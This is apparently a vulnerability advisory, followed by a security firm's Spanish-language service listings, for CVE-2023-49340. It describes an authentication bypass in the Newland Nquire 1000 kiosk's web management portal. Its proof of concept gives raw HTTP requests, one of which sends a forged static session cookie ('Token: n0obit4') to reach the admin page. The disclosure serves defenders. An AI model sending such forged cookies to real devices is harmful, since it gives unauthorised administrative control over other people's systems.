Improper Authorization in Newland Nquire web management portal leads authentication bypass

Nov 27, 2023

CVE Number

CVE-2023-49340

Credits

Deiby Gerez (n0obit4) of Pentraze Cybersecurity

Sumary:

An improper access control vulnerability was discovered in Newland Nquire 1000 Interactive Kiosk. This vulnerability enables an unauthenticated actor to bypass the login process, gaining unauthorized access to the administrative portal and allowing the execution of privileged actions.

CVSS

8.8 (High) - CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Details:

On successful login, a cookie is returned with the following value Token: 12345678, this key-pair value is used as session token to identify a logged-on users on the web application.

The key-pair value is static and is not properly verified by the web application, allowing an adversary to forge a cookie (e.g Cookie: Token: n0obit4) to gain full control over the management portal and perform privileged actions.

POC

In the following proof of concept i’ll perform a request without session cookie and other with a random cookie.

Normal flow without authentication

Request:

GET /log.htm HTTP/1.1
Host: 192.168.3.216
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b2;q=0.7
Referer: http://192.168.3.216/left.htm
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: 1f7bbba0
Connection: close

Response

Authentication bypass

Request

GET /log.htm HTTP/1.1
Host: 192.168.3.216
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b2;q=0.7
Referer: http://192.168.3.216/left.htm
Accept-Encoding: gzip, deflate

Cookie: Token: n0obit4

Accept-Language: en-US,en;q=0.9
If-None-Match: 1f7bbba0

Response

Servicios

Pruebas de Penetración

Evaluación proactiva utilizando tácticas, técnicas y procedimientos de atacantes reales para identificar fallas de seguridad, configuraciones incorrectas y vulnerabilidades.

Más información

Seguridad de Aplicaciones

Protección integral de aplicaciones, garantizando la seguridad en todas las fases del desarrollo.

Más información

Ejercicios de Red Team

Simulación avanzada de ataques cibernéticos para evaluar y mejorar la capacidad de respuesta de una organización.

Más información

Gestión de Vulnerabilidades

Proceso proactivo para identificar, priorizar y abordar las vulnerabilidades de seguridad en sistemas y software, mejorando la defensa de una organización contra las amenazas cibernéticas en evolución.

Más información